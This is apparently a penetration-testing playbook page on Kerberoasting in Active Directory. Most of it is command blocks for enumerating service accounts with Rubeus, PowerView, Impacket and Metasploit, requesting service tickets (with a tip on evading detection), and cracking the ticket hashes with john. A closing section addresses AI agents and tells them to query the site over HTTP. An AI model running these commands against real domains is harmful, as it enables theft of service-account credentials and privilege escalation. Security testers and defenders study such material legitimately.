# Kerberoast

<figure><img src="/files/E3t9Yu69XSFXikEdRXuw" alt=""><figcaption></figcaption></figure>

## Kerberoast

* Offline cracking of **service account** passwords. Pre-authentication should be enabled for that SPN.
* **Enumerate SPNs**: The attacker enumerates accounts with SPNs, which are typically associated with service accounts.&#x20;

{% code overflow="wrap" %}

```powershell
# AD Module
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName

# PowerView
Get-DomainUser -SPN

# Rubeus
.\Rubeus.exe kerberoast /stats


### Linux

# Metasploit framework
msf> use auxiliary/gather/get_user_spns

# Impacket
GetUserSPNs.py -request -dc-ip <DC_IP> <DOMAIN.FULL>/<USERNAME> -outputfile hashes.kerberoast # Password will be prompted
GetUserSPNs.py -request -dc-ip <DC_IP> -hashes <LMHASH>:<NTHASH> <DOMAIN>/<USERNAME> -outputfile hashes.kerberoast

# kerberoast: https://github.com/skelsec/kerberoast
kerberoast ldap spn 'ldap+ntlm-password://<DOMAIN.FULL>\<USERNAME>:<PASSWORD>@<DC_IP>' -o kerberoastable # 1. Enumerate kerberoastable users
kerberoast spnroast 'kerberos+password://<DOMAIN.FULL>\<USERNAME>:<PASSWORD>@<DC_IP>' -t kerberoastable_spn_users.txt -o kerberoast.hashes # 2. Dump hashes

```

{% endcode %}

* **Request Service Tickets**: The attacker requests a service ticket (TGS) for these SPNs.&#x20;

{% code overflow="wrap" %}

```powershell
Rubeus.exe kerberoast /user:svcadmin /simple

# To avoid detection, only request RC4 supported SPN
Rubeus.exe kerberoast /stats /rc4opsec
Rubeus.exe kerberoast /user:svcadmin /simple /rc4opsec

# Kerberoast all possible accounts (Bad Opsec)
Rubeus.exe kerberoast /rc4opsec /outfile:hashes.txt
```

{% endcode %}

* **Extract Ticket**: The requested TGS is encrypted with the service account's password hash.
* **Crack Password**: The attacker extracts the TGS from memory or logs and uses offline brute force or dictionary attacks to crack the password hash.

{% code overflow="wrap" %}

```powershell
john.exe --wordlist=C:\AD\Tools\kerberoast\10kworst-pass.txt C:\AD\Tools\hashes.txt
```

{% endcode %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://playbook.sidthoviti.com/active-directory-pentest/domain-privilege-escalation/kerberoast.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.